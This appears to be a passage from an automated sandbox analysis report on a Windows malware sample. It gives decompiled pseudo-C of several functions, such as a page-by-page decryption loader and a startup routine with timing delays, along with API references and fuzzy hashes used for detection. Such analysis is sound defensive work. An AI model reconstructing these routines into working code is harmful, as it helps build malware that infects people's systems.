								_t43 = E00D98557(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00D96130(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E00D96810(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xd9d160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E00D95C56(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x00d91e95
0x00d91e9f
0x00d91ea2
0x00d91ea5
0x00d91ea8
0x00d91eaf
0x00d91eb1
0x00d91ebd
0x00d91ebf
0x00d91ebf
0x00d91ec8
0x00d91ece
0x00d91ed3
0x00d91eed
0x00d91ef9
0x00d91efb
0x00d91f00
0x00d91f0a
0x00d91f0a
0x00d91f02
0x00d91f02
0x00d91f02
0x00d91f02
0x00d91f11
0x00d91f1e
0x00d91f25
0x00d91f2a
0x00d91f2a
0x00d91f33
0x00d91f36
0x00d91f5c
0x00d91f68
0x00d91f6d
0x00d91f72
0x00d91f74
0x00d91fa0
0x00d91fa2
0x00d91f76
0x00d91f7a
0x00d91f7f
0x00d91f84
0x00d91f8b
0x00d91f91
0x00d91f96
0x00d91f9c
0x00d91fa3
0x00d91fa5
0x00d91fa7
0x00d91fb6
0x00d91fbc
0x00d91fc1
0x00d91fc3
0x00d91ff3
0x00d91ff5
0x00d91fc5
0x00d91fc5
0x00d91fcb
0x00d91fd8
0x00d91fde
0x00d91fde
0x00d91fe6
0x00d91fef
0x00d91ff6
0x00d91ff8
0x00d91ffa
0x00d92001
0x00d9200e
0x00d92013
0x00d92018
0x00d9201a
0x00d9201c
0x00000000
0x00000000
0x00d9201e
0x00d92023
0x00d92025
0x00d9202c
0x00d92030
0x00d92033
0x00d92048
0x00d9204c
0x00d92051
0x00000000
0x00d92051
0x00d92035
0x00d92037
0x00000000
0x00000000
0x00d9203d
0x00d92042
0x00d92044
0x00d92046
0x00000000
0x00000000
0x00000000
0x00d92046
0x00d92029
0x00d92029
0x00d91ffa
0x00d91f38
0x00d91f38
0x00d91f3d
0x00d92053
0x00d92058
0x00d92060
0x00d92060
0x00000000
0x00d92058
0x00d91f43
0x00d91f46
0x00d91f50
0x00d91f57
0x00000000
0x00d92068
0x00d92068
0x00d9206b
0x00d9206f
0x00d9206f

APIs

Part of subcall function 00D94D5D: GetModuleHandleA.KERNEL32(4C44544E,00000000,00D91EAD,00000001), ref: 00D94D6C

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00D91F2A

Part of subcall function 00D96D10: RtlAllocateHeap.NTDLL(00000000,-00000008,00D95D29), ref: 00D96D1C

memset.NTDLL ref: 00D91F7A
RtlInitializeCriticalSection.NTDLL(04BD9570), ref: 00D91F8B

Part of subcall function 00D96810: memset.NTDLL ref: 00D9682A
Part of subcall function 00D96810: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00D96861
Part of subcall function 00D96810: StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00D92042), ref: 00D9686C

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00D91FB6
wsprintfA.USER32 ref: 00D91FE6

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: f4bbd820392c702c6547306be879b016da1a793fa22080649c9d23b13ea1e394
Instruction ID: c06400abbf55cecd5f39c6b892986548032d23bb25b6215766c984d75c8c6149
Opcode Fuzzy Hash: f4bbd820392c702c6547306be879b016da1a793fa22080649c9d23b13ea1e394
Instruction Fuzzy Hash: 9251A072A00319ABDF21EBE4DC45F6E77A9EB08704F184826F509E7291E774D905CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D96A7F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D96A7F() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E00D93A8E(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xd9d2a4; // 0x3e3a5a8
				_t4 = _t24 + 0xd9edb0; // 0x4bd9358
				_t5 = _t24 + 0xd9ed58; // 0x4f0053
				_t26 = E00D946B8( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xd9d2a4; // 0x3e3a5a8
						_t11 = _t32 + 0xd9eda4; // 0x4bd934c
						_t48 = _t11;
						_t12 = _t32 + 0xd9ed58; // 0x4f0053
						_t51 = E00D9241A(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0xd9d2a4; // 0x3e3a5a8
							_t13 = _t35 + 0xd9edee; // 0x30314549
							if(E00D93695(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
								_t60 =  *0xd9d25c - 6;
								if( *0xd9d25c <= 6) {
									_t42 =  *0xd9d2a4; // 0x3e3a5a8
									_t15 = _t42 + 0xd9ec0a; // 0x52384549
									E00D93695(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0xd9d2a4; // 0x3e3a5a8
							_t17 = _t38 + 0xd9ede8; // 0x4bd9390
							_t18 = _t38 + 0xd9edc0; // 0x680043
							_t45 = E00D9407F(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0xd9d238, 0, _t51);
						}
					}
					HeapFree( *0xd9d238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E00D93B83(_t53);
				}
				return _t45;
			}

0x00d96a8f
0x00d96a92
0x00d96a99
0x00d96a9b
0x00d96a9b
0x00d96a9e
0x00d96aa3
0x00d96aaa
0x00d96ab7
0x00d96abc
0x00d96ac0
0x00d96ace
0x00d96adc
0x00d96ae0
0x00d96b71
0x00d96b71
0x00d96ae6
0x00d96ae6
0x00d96aeb
0x00d96aeb
0x00d96af2
0x00d96afe
0x00d96b00
0x00d96b02
0x00d96b04
0x00d96b0b
0x00d96b1d
0x00d96b1f
0x00d96b26
0x00d96b28
0x00d96b2f
0x00d96b3a
0x00d96b3a
0x00d96b26
0x00d96b3f
0x00d96b44
0x00d96b4b
0x00d96b69
0x00d96b6b
0x00d96b6b
0x00d96b02
0x00d96b7d
0x00d96b7d
0x00d96b7f
0x00d96b84
0x00d96b86
0x00d96b86
0x00d96b91

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04BD9358,00000000,?,747DF710,00000000,747DF730), ref: 00D96ACE
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04BD9390,?,00000000,30314549,00000014,004F0053,04BD934C), ref: 00D96B6B
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00D961D1), ref: 00D96B7D

Strings

Uxt, xrefs: 00D96AD4

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: f206812b1508d119c457fc7fd54eccd8b8bdc14fc15c3a41e36a5a589ed702a7
Instruction ID: 5485dff0149ac90468b5cb34b38af27865f6d0e4df417713c4bf6da6a215cd4c
Opcode Fuzzy Hash: f206812b1508d119c457fc7fd54eccd8b8bdc14fc15c3a41e36a5a589ed702a7
Instruction Fuzzy Hash: 15317331600209BFDF11EB94DC45EAA7BBEEF44704F1504A6B604EB161E771DA05DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D95B7A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00D95B7A(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t26;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t43 =  *0xd9d2a4; // 0x3e3a5a8
				_push(0x800);
				_push(0);
				_push( *0xd9d238);
				_t1 = _t43 + 0xd9e791; // 0x6976612e
				_t44 = _t1;
				if( *0xd9d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0xd9d24c =  *0xd9d24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00D93769(_a4, _t41); // executed
						_t19 = E00D98779(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0xd9d24c < 5) {
								 *0xd9d24c =  *0xd9d24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E00D95225();
						RtlFreeHeap( *0xd9d238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E00D987B0(_a4, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				_t26 = RtlAllocateHeap(); // executed
				if(_t26 == 0) {
					goto L6;
				}
				_t25 = E00D91000(_a4, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}

0x00d95b7a
0x00d95b88
0x00d95b8f
0x00d95b94
0x00d95b96
0x00d95b9c
0x00d95b9c
0x00d95ba2
0x00d95bca
0x00d95be2
0x00d95be4
0x00d95be5
0x00d95be7
0x00d95c25
0x00d95c25
0x00d95c2b
0x00d95c31
0x00d95c31
0x00d95be9
0x00d95bef
0x00d95bf2
0x00d95c01
0x00d95c03
0x00d95c0a
0x00d95c3e
0x00d95c43
0x00d95c45
0x00d95c47
0x00d95c47
0x00000000
0x00d95c45
0x00d95c0c
0x00d95c11
0x00d95c1f
0x00000000
0x00d95c1f
0x00d95bd9
0x00d95bde
0x00d95bde
0x00000000
0x00d95bde
0x00d95ba4
0x00d95bac
0x00000000
0x00000000
0x00d95bbb
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00D95BA4

Part of subcall function 00D91000: GetTickCount.KERNEL32 ref: 00D9101A
Part of subcall function 00D91000: wsprintfA.USER32 ref: 00D91065
Part of subcall function 00D91000: wsprintfA.USER32 ref: 00D91084
Part of subcall function 00D91000: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D910B5
Part of subcall function 00D91000: GetTickCount.KERNEL32 ref: 00D910C6
Part of subcall function 00D91000: RtlEnterCriticalSection.NTDLL(04BD9570), ref: 00D910D6
Part of subcall function 00D91000: RtlLeaveCriticalSection.NTDLL(04BD9570), ref: 00D910F4
Part of subcall function 00D91000: StrTrimA.SHLWAPI(00000000,00D9C294,?,04BD95B0), ref: 00D9112B

RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 00D95BC2
RtlFreeHeap.NTDLL(00000000,?,?,?,00D96223,00000002,?,?,?,?), ref: 00D95C1F

Strings

Uxt, xrefs: 00D95C1F

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Allocate$CountCriticalSectionTickwsprintf$EnterFreeLeaveTrim
String ID: Uxt
API String ID: 2048538155-1536154274
Opcode ID: 500e4b2cc54586235a3267db9ce58477dc53602efdf5a08970193775f3d04f2f
Instruction ID: 0dda29e45678ef49e43eb850e005e0d0f795cebd9449475cd3ec8ccc1ea892c0
Opcode Fuzzy Hash: 500e4b2cc54586235a3267db9ce58477dc53602efdf5a08970193775f3d04f2f
Instruction Fuzzy Hash: 34216A75200709EBCF029FA9EC44F9A77ADEB49744F144026F905DB250DB70E905DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D96810, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00D96810(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0xd9d2a4; // 0x3e3a5a8
				_t5 = _t40 + 0xd9ee14; // 0x410025
				_t90 = E00D990A5(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E00D945B3(_v88);
					goto L24;
				}
				if(E00D93A8E(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E00D9A5A3(0,  *0xd9d33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0xd9d2a4; // 0x3e3a5a8
					_t11 = _t52 + 0xd9e81a; // 0x65696c43
					_t55 = E00D9A5A3(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E00D9424B(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E00D945B3(_t93);
					}
					if(_t81 != 0) {
						L17:
						E00D945B3(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E00D93B83(_t92);
						}
						goto L22;
					} else {
						if(( *0xd9d260 & 0x00000001) == 0) {
							L14:
							E00D93712(_t81, _v60, _v56,  *0xd9d270, 0);
							_t81 = E00D9582F(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E00D98F5F( &_v84, 0);
							}
							E00D945B3(_v60);
							goto L17;
						}
						_t67 =  *0xd9d2a4; // 0x3e3a5a8
						_t18 = _t67 + 0xd9e823; // 0x65696c43
						_t70 = E00D9A5A3(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E00D9424B( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E00D945B3(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x00d96826
0x00d9682a
0x00d96831
0x00d96839
0x00d9683a
0x00d9683b
0x00d9683c
0x00d9683d
0x00d9683e
0x00d96846
0x00d96852
0x00d96854
0x00d9685a
0x00d969c3
0x00d969c4
0x00d969cc
0x00d969cc
0x00d9686c
0x00d96874
0x00d969b5
0x00d969b6
0x00d969ba
0x00000000
0x00d969ba
0x00d96887
0x00d96889
0x00d96889
0x00d96895
0x00d9689a
0x00d968a0
0x00d969a3
0x00000000
0x00d968a6
0x00d968a6
0x00d968ab
0x00d968b4
0x00d968b9
0x00d968c2
0x00d968e9
0x00d968c4
0x00d968de
0x00d968e0
0x00d968e0
0x00d968ec
0x00d96996
0x00d9699a
0x00d969a4
0x00d969a4
0x00d969aa
0x00d969ac
0x00d969ac
0x00000000
0x00d968f2
0x00d968f9
0x00d9693e
0x00d96951
0x00d9696a
0x00d9696e
0x00d96974
0x00d9697c
0x00d9698b
0x00d9698b
0x00d96991
0x00000000
0x00d96991
0x00d968fb
0x00d96900
0x00d96909
0x00d9690e
0x00d96912
0x00d96939
0x00d96914
0x00d96924
0x00d9692e
0x00d96930
0x00d96930
0x00d9693c
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9693c
0x00d968ec

APIs

memset.NTDLL ref: 00D9682A

Part of subcall function 00D990A5: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00D96852,00410025,00000005,?,00000000), ref: 00D990B6
Part of subcall function 00D990A5: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00D990D3

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00D96861
StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00D92042), ref: 00D9686C

Strings

Clie, xrefs: 00D96924

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID: Clie
API String ID: 3817122888-1624203186
Opcode ID: a31d04d95ab95ee36bf337f688b3aeda90b72104b39b8ef928173510e4a7b07b
Instruction ID: be5d563fadb9afde6dab8fe81bda5eb1adbc775a7de4389825d4c2472e5fdd40
Opcode Fuzzy Hash: a31d04d95ab95ee36bf337f688b3aeda90b72104b39b8ef928173510e4a7b07b
Instruction Fuzzy Hash: 9F418A72608300BFDF11AFA48D85E6BBBEDEF88714F45092AB984D7151DA71D9048BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D956F9, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00D95756
SysAllocString.OLEAUT32(00D98CCC), ref: 00D9579A
SysFreeString.OLEAUT32(00000000), ref: 00D957AE
SysFreeString.OLEAUT32(00000000), ref: 00D957BC

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 5c29128327322d7d22b329f1d30b610ba4ce2c5fee8709b1b746eb11980737c0
Instruction ID: 06f9584de142db8212204381a3d9267e673fb0cbb137ef28390336ca50896bdc
Opcode Fuzzy Hash: 5c29128327322d7d22b329f1d30b610ba4ce2c5fee8709b1b746eb11980737c0
Instruction Fuzzy Hash: DC31E776900609EFCF05DFD8E8C48AE7BB9EF48340B24842AF90ADB250D7319A45CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00511B04, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00511B04(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x514130;
				_t42 = E00511652(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x514140;
						} else {
							_t53 = _t49 - _t79;
							_v32 = _t53;
							_v36 = _t53 + _a4 + 0x5151a2;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E00511E27(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x514140 = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x00511b0b
0x00511b1b
0x00511b20
0x00511b25
0x00511b3a
0x00511b41
0x00511b46
0x00511b57
0x00511b5a
0x00511b60
0x00511b65
0x00511c0f
0x00511b6b
0x00511b6b
0x00511b71
0x00511bd7
0x00511b73
0x00511b76
0x00511b80
0x00511b83
0x00511b86
0x00511b8e
0x00511b99
0x00511b9a
0x00511b9b
0x00511baa
0x00511bb3
0x00511bbd
0x00511bc0
0x00511bc3
0x00511bca
0x00511bd2
0x00000000
0x00000000
0x00511b8b
0x00511b8b
0x00511bd4
0x00511be1
0x00511bf6
0x00511be3
0x00511bec
0x00511bf1
0x00511c07
0x00511c07
0x00511c16
0x00511c1c

APIs

VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00511B5A
memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,00511F42,-00000008), ref: 00511BEC
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00511C07

Strings

Nov 6 2020, xrefs: 00511B91

Memory Dump Source

Source File: 00000001.00000002.599968385.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true

Associated: 00000001.00000002.599974897.0000000000515000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.599996450.0000000000517000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Nov 6 2020
API String ID: 4010158826-3693430718
Opcode ID: 71315ef4bb8eac152fb5c9107efce30ad6b13da2917c87e509d2d91232b876a8
Instruction ID: ff311ac2940d5dc8a7cd5d3481a67d6254d126c063b3035c090ffccc022cbddf
Opcode Fuzzy Hash: 71315ef4bb8eac152fb5c9107efce30ad6b13da2917c87e509d2d91232b876a8
Instruction Fuzzy Hash: 65317E71D4061AEFEB01CF94D884BEEBBB4FF58304F1081A8EA00BB240D775AA45DB84

Uniqueness

Uniqueness Score: -1.00%

Function 00D938B1, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00D938B1(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00D96D10(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00d938bd
0x00d938c1
0x00d938c2
0x00d938c3
0x00d938c5
0x00d938c7
0x00d938ca
0x00d938cf
0x00d93966
0x00d9396d
0x00d9396d
0x00d938d8
0x00d938df
0x00d938ef
0x00d938ef
0x00d938f5
0x00d938f7
0x00d938fc
0x00d93905
0x00d9390b
0x00d93910
0x00d9391b
0x00d9391f
0x00d93921
0x00d93922
0x00d9392b
0x00d9392f
0x00d93940
0x00d93931
0x00d93936
0x00d9393b
0x00d9394a
0x00d9394a
0x00d9391f
0x00d93950
0x00d93956
0x00d93956
0x00d9395f
0x00d93964
0x00d93964
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00D938DF
lstrlenW.KERNEL32(?), ref: 00D93915
memcpy.NTDLL(00000000,?,?,?), ref: 00D93936
SysFreeString.OLEAUT32(?), ref: 00D9394A

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.600626990.0000000000D9D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600635591.0000000000D9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 787d27af73c75794d18150df687a8d99612b2523691c3440f3d6ad3e6bb42012
Instruction ID: 79e72eb49d8bf75c0166d53ed4890c4be013c8d218ce988e1ecb8615a3106f44
Opcode Fuzzy Hash: 787d27af73c75794d18150df687a8d99612b2523691c3440f3d6ad3e6bb42012
Instruction Fuzzy Hash: 25212C7590120AFFCB11DFA8C888A9EBBB8EF49354B144169E945E7310EB70DB40CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D9567B, Relevance: 6.0, APIs: 4, Instructions: 38
sleepmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D9567B(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0xd9d238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0xd9d1a8 = GetTickCount();
				_t7 = E00D93B0B(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E00D95CDC(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E00D96BF1(_t15) != 0) {
						 *0xd9d260 = 1; // executed
					}
					_t13 = E00D91E95(_t16); // executed
					return _t13;
				}
				return _t7;
			}

0x00d9567b
0x00d95684
0x00d9568a
0x00d95691
0x00d95695
0x00000000
0x00d95695
0x00d956a2
0x00d956a7
0x00d956ae
0x00d956b2
0x00d956be
0x00d956c2
0x00d956d1
0x00d956d7
0x00d956e5
0x00d956e7
0x00d956e7
0x00d956f1
0x00000000
0x00d956f1
0x00d956f6

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,00D9220C,?), ref: 00D95684
GetTickCount.KERNEL32 ref: 00D95698
SwitchToThread.KERNEL32(?,00000001,?), ref: 00D956B2
Sleep.KERNELBASE(00000000,-00000008,?,00000001,?), ref: 00D956D1

Memory Dump Source

Source File: 00000001.00000002.600605042.0000000000D91000.00000020.00000001.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.600596480.0000000000D90000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.600618690.0000000000D9C000.00000002.00000001.sdmp Download File
